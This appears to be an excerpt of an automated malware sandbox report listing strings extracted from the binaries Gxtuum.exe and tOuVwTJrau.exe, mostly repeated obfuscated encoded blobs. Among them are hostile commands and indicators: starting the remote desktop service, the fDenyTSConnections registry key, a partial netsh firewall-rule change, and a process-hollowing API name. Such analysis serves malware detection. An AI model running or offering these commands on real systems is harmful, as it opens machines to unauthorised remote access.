K0o2PJ7SS9pbBugUe2sQySucB==MNVNPLAUUf7GVMqFAI==0wFqaq==Xw9NTq==USVOdOQ0gfM0fUQ0eVM01ek01PI0fyM0gO402y001PY0ezY0eUc0fb0=1VJfXsWobBv81Uqp4u2gbLtX1VJfXsWobBu=1UxjasWobBu=2vE=2LE=2LI=2LM=WOFj 7==dzRUatfzLr==dzRUaxD Lt6=2Phf2yxm1U1efzMrePNjhelqOVFV9MM4SyM+SyQ+OTBmbM5tbiKvNqslLo==is==MfVo9NHcSI==fUhf wnDMd3keyp=dUVs cMwMuGu2yqsUUVURcw4aSXlXVez5ySpS11bdt==XzJpXTAlbPPhgyycTNZvSRHkUX7mgz7h4eR=TPZjacv=VUFtawMCcXr5LwqhP9==UNNzTq==XyFoXwvkUXTjgPCp5zh=Uy9dbw0CIAbl19==TNZBPrYqTw04YRvT2OG14eiWeV==TelUXwMqZR3k2PB=We9sbw0yXU9q9w0DTU9n SIzYUloPwMqZR3k2PB=PvEsKpH5Nea4RI==feI=gUI=TU9obwMydxZUhPulFaypd1tPcUClarHl2e9s ISoYSPhRqui3VSqZLBngQ1xJWRjOK0nJIRxGIpx SW4ZR30OMKp4Vyrc7hPcT yMmsceVJnJMIldBC7LyYh3OR5IrN7fDFmMCscdOxf cwxZOYiL90EOS0ydBTuguUU6PyhOnx7eECw90E8gylp 90zYYPlguUz5zGhY1WCEd1OGIonJIRxLNY=OK0HA7==SVNda RBOepqXm==TU9obwMydxZUhPulFaydcMxhcTOlbKclea9YJN57dtZmeVCtCPSubLRj0Z oX0H=XTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcTU2t4zSWZ2FD0T2pVIElePBVbwMCThDt2I==TU9naxM4ZSHO1OUl1OJdXwMqZXfpdems3O2rcMBne0S5br5UhPoqKJzDNyS2Qr 5CN5=OPVo9MEzZBStXTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcYOYp5ySgVrh 1T gO40EYxJJRvo0SPPFWTp=XTlNTuMRXzLvefKy3UuPZ2MlOAGgS6MogeldXNEgQhDzdOGE2PKsbLBUZC0tXKMlYeleXM0NRv==0vAqKtr=UyVgWNMwdALlgzKp3eavLqdH1UOz LMQdO9oUyVgWNMwdALlgzKp3eavLqhH1UOz LMQdO9oXS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVMaRbIgQYTyfeOu5xWhcsJedZ5=XzJpXxMndz3heON=PbArMG==PbAsK7==PbArL7==PbAsLG==TVVsacMydzH1dOqk0s==Rbo0ffVoXwowMuGu2PalOUsaLfRbaSkvaRvsLu2mzu6lbXw8LaAgH9s4aRZleVO0zvBcJnU61DWwGE==MaYaPN9tdxG=LaAgH9sCZR2gLuYgGq==Xy9XXNADaBTseuYl6yR=OOVYXME5dBjvefuv3yifeXxn1T2zbKMpdOdoXMHkLPXpeyNgz9==L9==fUhVbwIzdX2gOPFgCPNcMF==fVQ3am==feFoXw0xVUVZWc0lchOgWyy53VSWXKxn1TyzW0H=PvAqKtr4MOi=PvAqKtr4MeG=PvAqKtr4MeK=PvAqKtr4MXW=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule gr
                        Source: Gxtuum.exe, 00000014.00000002.2274409335.0000000000131000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: net start termservice
                        Source: Gxtuum.exe, 00000014.00000002.2274409335.0000000000131000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setd3a5912ea69ad34a2387af70c8be9e2143266f2abbf198987ad62d4962cf71340f3be6bcafd92004fa390d280e7ea4875c9234PLgVJ 8BLeW4Obx0Eo==OrdW9wQuaXSzOUeuQyS0Lsxdex==PLgVJ 8BLeW4Obx0Fs==OrhAbdL5ahe0UyCTCUiqZLRTNkCsaE==QK4rKq==Xq0f xLxMK1mbG==OKVmbG==2OUsMMMlNOy419==UVhUbNMxLhT42I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyR6W 2I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7TNEpcdzTdyOs3uyCb7t 1UKDXVRbadI5cv==XeVn1U1eGs0HIAHNUweSzu6vL8A6XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyffVoXwowMuGgXzJpXTAlbSK=XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7SS9pbBugUe2sQySucB==MNVNPLAUUf7GVMqFAI==0wFqaq==Xw9NTq==USVOdOQ0gfM0fUQ0eVM01ek01PI0fyM0gO402y001PY0ezY0eUc0fb0=1VJfXsWobBv81Uqp4u2gbLtX1VJfXsWobBu=1UxjasWobBu=2vE=2LE=2LI=2LM=WOFj 7==dzRUatfzLr==dzRUaxD Lt6=2Phf2yxm1U1efzMrePNjhelqOVFV9MM4SyM+SyQ+OTBmbM5tbiKvNqslLo==is==MfVo9NHcSI==fUhf wnDMd3keyp=dUVs cMwMuGu2yqsUUVURcw4aSXlXVez5ySpS11bdt==XzJpXTAlbPPhgyycTNZvSRHkUX7mgz7h4eR=TPZjacv=VUFtawMCcXr5LwqhP9==UNNzTq==XyFoXwvkUXTjgPCp5zh=Uy9dbw0CIAbl19==TNZBPrYqTw04YRvT2OG14eiWeV==TelUXwMqZR3k2PB=We9sbw0yXU9q9w0DTU9n SIzYUloPwMqZR3k2PB=PvEsKpH5Nea4RI==feI=gUI=TU9obwMydxZUhPulFaypd1tPcUClarHl2e9s ISoYSPhRqui3VSqZLBngQ1xJWRjOK0nJIRxGIpx SW4ZR30OMKp4Vyrc7hPcT yMmsceVJnJMIldBC7LyYh3OR5IrN7fDFmMCscdOxf cwxZOYiL90EOS0ydBTuguUU6PyhOnx7eECw90E8gylp 90zYYPlguUz5zGhY1WCEd1OGIonJIRxLNY=OK0HA7==SVNda RBOepqXm==TU9obwMydxZUhPulFaydcMxhcTOlbKclea9YJN57dtZmeVCtCPSubLRj0Z oX0H=XTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcTU2t4zSWZ2FD0T2pVIElePBVbwMCThDt2I==TU9naxM4ZSHO1OUl1OJdXwMqZXfpdems3O2rcMBne0S5br5UhPoqKJzDNyS2Qr 5CN5=OPVo9MEzZBStXTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcYOYp5ySgVrh 1T gO40EYxJJRvo0SPPFWTp=XTlNTuMRXzLvefKy3UuPZ2MlOAGgS6MogeldXNEgQhDzdOGE2PKsbLBUZC0tXKMlYeleXM0NRv==0vAqKtr=UyVgWNMwdALlgzKp3eavLqdH1UOz LMQdO9oUyVgWNMwdALlgzKp3eavLqhH1UOz LMQdO9oXS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVMaRbIgQYTyfeOu5xWhcsJedZ5=XzJpXxMndz3heON=PbArMG==PbAsK7==PbArL7==PbAsLG==TVVsacMydzH1dOqk0s==Rbo0ffVoXwowMuGu2PalOUsaLfRbaSkvaRvsLu2mzu6lbXw8LaAgH9s4aRZleVO0zvBcJnU61DWwGE==MaYaPN9tdxG=LaAgH9sCZR2gLuYgGq==Xy9XXNADaBTseuYl6yR=OOVYXME5dBjvefuv3yifeXxn1T2zbKMpdOdoXMHkLPXpeyNgz9==L9==fUhVbwIzdX2gOPFgCPNcMF==fVQ3am==feFoXw0xVUVZWc0lchOgWyy53VSWXKxn1TyzW0H=PvAqKtr4MOi=PvAqKtr4MeG=PvAqKtr4MeK=PvAqKtr4MXW=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule gr
                        Source: Gxtuum.exe, 00000014.00000000.2270894566.0000000000131000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: net start termservice
                        Source: Gxtuum.exe, 00000014.00000000.2270894566.0000000000131000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setd3a5912ea69ad34a2387af70c8be9e2143266f2abbf198987ad62d4962cf71340f3be6bcafd92004fa390d280e7ea4875c9234PLgVJ 8BLeW4Obx0Eo==OrdW9wQuaXSzOUeuQyS0Lsxdex==PLgVJ 8BLeW4Obx0Fs==OrhAbdL5ahe0UyCTCUiqZLRTNkCsaE==QK4rKq==Xq0f xLxMK1mbG==OKVmbG==2OUsMMMlNOy419==UVhUbNMxLhT42I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyR6W 2I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7TNEpcdzTdyOs3uyCb7t 1UKDXVRbadI5cv==XeVn1U1eGs0HIAHNUweSzu6vL8A6XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyffVoXwowMuGgXzJpXTAlbSK=XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7SS9pbBugUe2sQySucB==MNVNPLAUUf7GVMqFAI==0wFqaq==Xw9NTq==USVOdOQ0gfM0fUQ0eVM01ek01PI0fyM0gO402y001PY0ezY0eUc0fb0=1VJfXsWobBv81Uqp4u2gbLtX1VJfXsWobBu=1UxjasWobBu=2vE=2LE=2LI=2LM=WOFj 7==dzRUatfzLr==dzRUaxD Lt6=2Phf2yxm1U1efzMrePNjhelqOVFV9MM4SyM+SyQ+OTBmbM5tbiKvNqslLo==is==MfVo9NHcSI==fUhf wnDMd3keyp=dUVs cMwMuGu2yqsUUVURcw4aSXlXVez5ySpS11bdt==XzJpXTAlbPPhgyycTNZvSRHkUX7mgz7h4eR=TPZjacv=VUFtawMCcXr5LwqhP9==UNNzTq==XyFoXwvkUXTjgPCp5zh=Uy9dbw0CIAbl19==TNZBPrYqTw04YRvT2OG14eiWeV==TelUXwMqZR3k2PB=We9sbw0yXU9q9w0DTU9n SIzYUloPwMqZR3k2PB=PvEsKpH5Nea4RI==feI=gUI=TU9obwMydxZUhPulFaypd1tPcUClarHl2e9s ISoYSPhRqui3VSqZLBngQ1xJWRjOK0nJIRxGIpx SW4ZR30OMKp4Vyrc7hPcT yMmsceVJnJMIldBC7LyYh3OR5IrN7fDFmMCscdOxf cwxZOYiL90EOS0ydBTuguUU6PyhOnx7eECw90E8gylp 90zYYPlguUz5zGhY1WCEd1OGIonJIRxLNY=OK0HA7==SVNda RBOepqXm==TU9obwMydxZUhPulFaydcMxhcTOlbKclea9YJN57dtZmeVCtCPSubLRj0Z oX0H=XTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcTU2t4zSWZ2FD0T2pVIElePBVbwMCThDt2I==TU9naxM4ZSHO1OUl1OJdXwMqZXfpdems3O2rcMBne0S5br5UhPoqKJzDNyS2Qr 5CN5=OPVo9MEzZBStXTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcYOYp5ySgVrh 1T gO40EYxJJRvo0SPPFWTp=XTlNTuMRXzLvefKy3UuPZ2MlOAGgS6MogeldXNEgQhDzdOGE2PKsbLBUZC0tXKMlYeleXM0NRv==0vAqKtr=UyVgWNMwdALlgzKp3eavLqdH1UOz LMQdO9oUyVgWNMwdALlgzKp3eavLqhH1UOz LMQdO9oXS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVMaRbIgQYTyfeOu5xWhcsJedZ5=XzJpXxMndz3heON=PbArMG==PbAsK7==PbArL7==PbAsLG==TVVsacMydzH1dOqk0s==Rbo0ffVoXwowMuGu2PalOUsaLfRbaSkvaRvsLu2mzu6lbXw8LaAgH9s4aRZleVO0zvBcJnU61DWwGE==MaYaPN9tdxG=LaAgH9sCZR2gLuYgGq==Xy9XXNADaBTseuYl6yR=OOVYXME5dBjvefuv3yifeXxn1T2zbKMpdOdoXMHkLPXpeyNgz9==L9==fUhVbwIzdX2gOPFgCPNcMF==fVQ3am==feFoXw0xVUVZWc0lchOgWyy53VSWXKxn1TyzW0H=PvAqKtr4MOi=PvAqKtr4MeG=PvAqKtr4MeK=PvAqKtr4MXW=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule gr
                        Source: Gxtuum.exe, 00000016.00000000.2859619631.0000000000131000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: net start termservice
                        Source: Gxtuum.exe, 00000016.00000000.2859619631.0000000000131000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setd3a5912ea69ad34a2387af70c8be9e2143266f2abbf198987ad62d4962cf71340f3be6bcafd92004fa390d280e7ea4875c9234PLgVJ 8BLeW4Obx0Eo==OrdW9wQuaXSzOUeuQyS0Lsxdex==PLgVJ 8BLeW4Obx0Fs==OrhAbdL5ahe0UyCTCUiqZLRTNkCsaE==QK4rKq==Xq0f xLxMK1mbG==OKVmbG==2OUsMMMlNOy419==UVhUbNMxLhT42I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyR6W 2I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7TNEpcdzTdyOs3uyCb7t 1UKDXVRbadI5cv==XeVn1U1eGs0HIAHNUweSzu6vL8A6XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyffVoXwowMuGgXzJpXTAlbSK=XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7SS9pbBugUe2sQySucB==MNVNPLAUUf7GVMqFAI==0wFqaq==Xw9NTq==USVOdOQ0gfM0fUQ0eVM01ek01PI0fyM0gO402y001PY0ezY0eUc0fb0=1VJfXsWobBv81Uqp4u2gbLtX1VJfXsWobBu=1UxjasWobBu=2vE=2LE=2LI=2LM=WOFj 7==dzRUatfzLr==dzRUaxD Lt6=2Phf2yxm1U1efzMrePNjhelqOVFV9MM4SyM+SyQ+OTBmbM5tbiKvNqslLo==is==MfVo9NHcSI==fUhf wnDMd3keyp=dUVs cMwMuGu2yqsUUVURcw4aSXlXVez5ySpS11bdt==XzJpXTAlbPPhgyycTNZvSRHkUX7mgz7h4eR=TPZjacv=VUFtawMCcXr5LwqhP9==UNNzTq==XyFoXwvkUXTjgPCp5zh=Uy9dbw0CIAbl19==TNZBPrYqTw04YRvT2OG14eiWeV==TelUXwMqZR3k2PB=We9sbw0yXU9q9w0DTU9n SIzYUloPwMqZR3k2PB=PvEsKpH5Nea4RI==feI=gUI=TU9obwMydxZUhPulFaypd1tPcUClarHl2e9s ISoYSPhRqui3VSqZLBngQ1xJWRjOK0nJIRxGIpx SW4ZR30OMKp4Vyrc7hPcT yMmsceVJnJMIldBC7LyYh3OR5IrN7fDFmMCscdOxf cwxZOYiL90EOS0ydBTuguUU6PyhOnx7eECw90E8gylp 90zYYPlguUz5zGhY1WCEd1OGIonJIRxLNY=OK0HA7==SVNda RBOepqXm==TU9obwMydxZUhPulFaydcMxhcTOlbKclea9YJN57dtZmeVCtCPSubLRj0Z oX0H=XTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcTU2t4zSWZ2FD0T2pVIElePBVbwMCThDt2I==TU9naxM4ZSHO1OUl1OJdXwMqZXfpdems3O2rcMBne0S5br5UhPoqKJzDNyS2Qr 5CN5=OPVo9MEzZBStXTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcYOYp5ySgVrh 1T gO40EYxJJRvo0SPPFWTp=XTlNTuMRXzLvefKy3UuPZ2MlOAGgS6MogeldXNEgQhDzdOGE2PKsbLBUZC0tXKMlYeleXM0NRv==0vAqKtr=UyVgWNMwdALlgzKp3eavLqdH1UOz LMQdO9oUyVgWNMwdALlgzKp3eavLqhH1UOz LMQdO9oXS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVMaRbIgQYTyfeOu5xWhcsJedZ5=XzJpXxMndz3heON=PbArMG==PbAsK7==PbArL7==PbAsLG==TVVsacMydzH1dOqk0s==Rbo0ffVoXwowMuGu2PalOUsaLfRbaSkvaRvsLu2mzu6lbXw8LaAgH9s4aRZleVO0zvBcJnU61DWwGE==MaYaPN9tdxG=LaAgH9sCZR2gLuYgGq==Xy9XXNADaBTseuYl6yR=OOVYXME5dBjvefuv3yifeXxn1T2zbKMpdOdoXMHkLPXpeyNgz9==L9==fUhVbwIzdX2gOPFgCPNcMF==fVQ3am==feFoXw0xVUVZWc0lchOgWyy53VSWXKxn1TyzW0H=PvAqKtr4MOi=PvAqKtr4MeG=PvAqKtr4MeK=PvAqKtr4MXW=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule gr
                        Source: Gxtuum.exe, 00000016.00000002.2862673039.0000000000131000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: net start termservice
                        Source: Gxtuum.exe, 00000016.00000002.2862673039.0000000000131000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setd3a5912ea69ad34a2387af70c8be9e2143266f2abbf198987ad62d4962cf71340f3be6bcafd92004fa390d280e7ea4875c9234PLgVJ 8BLeW4Obx0Eo==OrdW9wQuaXSzOUeuQyS0Lsxdex==PLgVJ 8BLeW4Obx0Fs==OrhAbdL5ahe0UyCTCUiqZLRTNkCsaE==QK4rKq==Xq0f xLxMK1mbG==OKVmbG==2OUsMMMlNOy419==UVhUbNMxLhT42I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyR6W 2I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7TNEpcdzTdyOs3uyCb7t 1UKDXVRbadI5cv==XeVn1U1eGs0HIAHNUweSzu6vL8A6XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyffVoXwowMuGgXzJpXTAlbSK=XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7SS9pbBugUe2sQySucB==MNVNPLAUUf7GVMqFAI==0wFqaq==Xw9NTq==USVOdOQ0gfM0fUQ0eVM01ek01PI0fyM0gO402y001PY0ezY0eUc0fb0=1VJfXsWobBv81Uqp4u2gbLtX1VJfXsWobBu=1UxjasWobBu=2vE=2LE=2LI=2LM=WOFj 7==dzRUatfzLr==dzRUaxD Lt6=2Phf2yxm1U1efzMrePNjhelqOVFV9MM4SyM+SyQ+OTBmbM5tbiKvNqslLo==is==MfVo9NHcSI==fUhf wnDMd3keyp=dUVs cMwMuGu2yqsUUVURcw4aSXlXVez5ySpS11bdt==XzJpXTAlbPPhgyycTNZvSRHkUX7mgz7h4eR=TPZjacv=VUFtawMCcXr5LwqhP9==UNNzTq==XyFoXwvkUXTjgPCp5zh=Uy9dbw0CIAbl19==TNZBPrYqTw04YRvT2OG14eiWeV==TelUXwMqZR3k2PB=We9sbw0yXU9q9w0DTU9n SIzYUloPwMqZR3k2PB=PvEsKpH5Nea4RI==feI=gUI=TU9obwMydxZUhPulFaypd1tPcUClarHl2e9s ISoYSPhRqui3VSqZLBngQ1xJWRjOK0nJIRxGIpx SW4ZR30OMKp4Vyrc7hPcT yMmsceVJnJMIldBC7LyYh3OR5IrN7fDFmMCscdOxf cwxZOYiL90EOS0ydBTuguUU6PyhOnx7eECw90E8gylp 90zYYPlguUz5zGhY1WCEd1OGIonJIRxLNY=OK0HA7==SVNda RBOepqXm==TU9obwMydxZUhPulFaydcMxhcTOlbKclea9YJN57dtZmeVCtCPSubLRj0Z oX0H=XTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcTU2t4zSWZ2FD0T2pVIElePBVbwMCThDt2I==TU9naxM4ZSHO1OUl1OJdXwMqZXfpdems3O2rcMBne0S5br5UhPoqKJzDNyS2Qr 5CN5=OPVo9MEzZBStXTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcYOYp5ySgVrh 1T gO40EYxJJRvo0SPPFWTp=XTlNTuMRXzLvefKy3UuPZ2MlOAGgS6MogeldXNEgQhDzdOGE2PKsbLBUZC0tXKMlYeleXM0NRv==0vAqKtr=UyVgWNMwdALlgzKp3eavLqdH1UOz LMQdO9oUyVgWNMwdALlgzKp3eavLqhH1UOz LMQdO9oXS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVMaRbIgQYTyfeOu5xWhcsJedZ5=XzJpXxMndz3heON=PbArMG==PbAsK7==PbArL7==PbAsLG==TVVsacMydzH1dOqk0s==Rbo0ffVoXwowMuGu2PalOUsaLfRbaSkvaRvsLu2mzu6lbXw8LaAgH9s4aRZleVO0zvBcJnU61DWwGE==MaYaPN9tdxG=LaAgH9sCZR2gLuYgGq==Xy9XXNADaBTseuYl6yR=OOVYXME5dBjvefuv3yifeXxn1T2zbKMpdOdoXMHkLPXpeyNgz9==L9==fUhVbwIzdX2gOPFgCPNcMF==fVQ3am==feFoXw0xVUVZWc0lchOgWyy53VSWXKxn1TyzW0H=PvAqKtr4MOi=PvAqKtr4MeG=PvAqKtr4MeK=PvAqKtr4MXW=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule gr
                        Source: tOuVwTJrau.exeString found in binary or memory: net start termservice
                        Source: tOuVwTJrau.exeString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setd3a5912ea69ad34a2387af70c8be9e2143266f2abbf198987ad62d4962cf71340f3be6bcafd92004fa390d280e7ea4875c9234PLgVJ 8BLeW4Obx0Eo==OrdW9wQuaXSzOUeuQyS0Lsxdex==PLgVJ 8BLeW4Obx0Fs==OrhAbdL5ahe0UyCTCUiqZLRTNkCsaE==QK4rKq==Xq0f xLxMK1mbG==OKVmbG==2OUsMMMlNOy419==UVhUbNMxLhT42I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyR6W 2I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7TNEpcdzTdyOs3uyCb7t 1UKDXVRbadI5cv==XeVn1U1eGs0HIAHNUweSzu6vL8A6XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyffVoXwowMuGgXzJpXTAlbSK=XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7SS9pbBugUe2sQySucB==MNVNPLAUUf7GVMqFAI==0wFqaq==Xw9NTq==USVOdOQ0gfM0fUQ0eVM01ek01PI0fyM0gO402y001PY0ezY0eUc0fb0=1VJfXsWobBv81Uqp4u2gbLtX1VJfXsWobBu=1UxjasWobBu=2vE=2LE=2LI=2LM=WOFj 7==dzRUatfzLr==dzRUaxD Lt6=2Phf2yxm1U1efzMrePNjhelqOVFV9MM4SyM+SyQ+OTBmbM5tbiKvNqslLo==is==MfVo9NHcSI==fUhf wnDMd3keyp=dUVs cMwMuGu2yqsUUVURcw4aSXlXVez5ySpS11bdt==XzJpXTAlbPPhgyycTNZvSRHkUX7mgz7h4eR=TPZjacv=VUFtawMCcXr5LwqhP9==UNNzTq==XyFoXwvkUXTjgPCp5zh=Uy9dbw0CIAbl19==TNZBPrYqTw04YRvT2OG14eiWeV==TelUXwMqZR3k2PB=We9sbw0yXU9q9w0DTU9n SIzYUloPwMqZR3k2PB=PvEsKpH5Nea4RI==feI=gUI=TU9obwMydxZUhPulFaypd1tPcUClarHl2e9s ISoYSPhRqui3VSqZLBngQ1xJWRjOK0nJIRxGIpx SW4ZR30OMKp4Vyrc7hPcT yMmsceVJnJMIldBC7LyYh3OR5IrN7fDFmMCscdOxf cwxZOYiL90EOS0ydBTuguUU6PyhOnx7eECw90E8gylp 90zYYPlguUz5zGhY1WCEd1OGIonJIRxLNY=OK0HA7==SVNda RBOepqXm==TU9obwMydxZUhPulFaydcMxhcTOlbKclea9YJN57dtZmeVCtCPSubLRj0Z oX0H=XTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcTU2t4zSWZ2FD0T2pVIElePBVbwMCThDt2I==TU9naxM4ZSHO1OUl1OJdXwMqZXfpdems3O2rcMBne0S5br5UhPoqKJzDNyS2Qr 5CN5=OPVo9MEzZBStXTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcYOYp5ySgVrh 1T gO40EYxJJRvo0SPPFWTp=XTlNTuMRXzLvefKy3UuPZ2MlOAGgS6MogeldXNEgQhDzdOGE2PKsbLBUZC0tXKMlYeleXM0NRv==0vAqKtr=UyVgWNMwdALlgzKp3eavLqdH1UOz LMQdO9oUyVgWNMwdALlgzKp3eavLqhH1UOz LMQdO9oXS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVMaRbIgQYTyfeOu5xWhcsJedZ5=XzJpXxMndz3heON=PbArMG==PbAsK7==PbArL7==PbAsLG==TVVsacMydzH1dOqk0s==Rbo0ffVoXwowMuGu2PalOUsaLfRbaSkvaRvsLu2mzu6lbXw8LaAgH9s4aRZleVO0zvBcJnU61DWwGE==MaYaPN9tdxG=LaAgH9sCZR2gLuYgGq==Xy9XXNADaBTseuYl6yR=OOVYXME5dBjvefuv3yifeXxn1T2zbKMpdOdoXMHkLPXpeyNgz9==L9==fUhVbwIzdX2gOPFgCPNcMF==fVQ3am==feFoXw0xVUVZWc0lchOgWyy53VSWXKxn1TyzW0H=PvAqKtr4MOi=PvAqKtr4MeG=PvAqKtr4MeK=PvAqKtr4MXW=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule gr
                        Source: Gxtuum.exe.0.drString found in binary or memory: net start termservice
                        Source: Gxtuum.exe.0.drString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setd3a5912ea69ad34a2387af70c8be9e2143266f2abbf198987ad62d4962cf71340f3be6bcafd92004fa390d280e7ea4875c9234PLgVJ 8BLeW4Obx0Eo==OrdW9wQuaXSzOUeuQyS0Lsxdex==PLgVJ 8BLeW4Obx0Fs==OrhAbdL5ahe0UyCTCUiqZLRTNkCsaE==QK4rKq==Xq0f 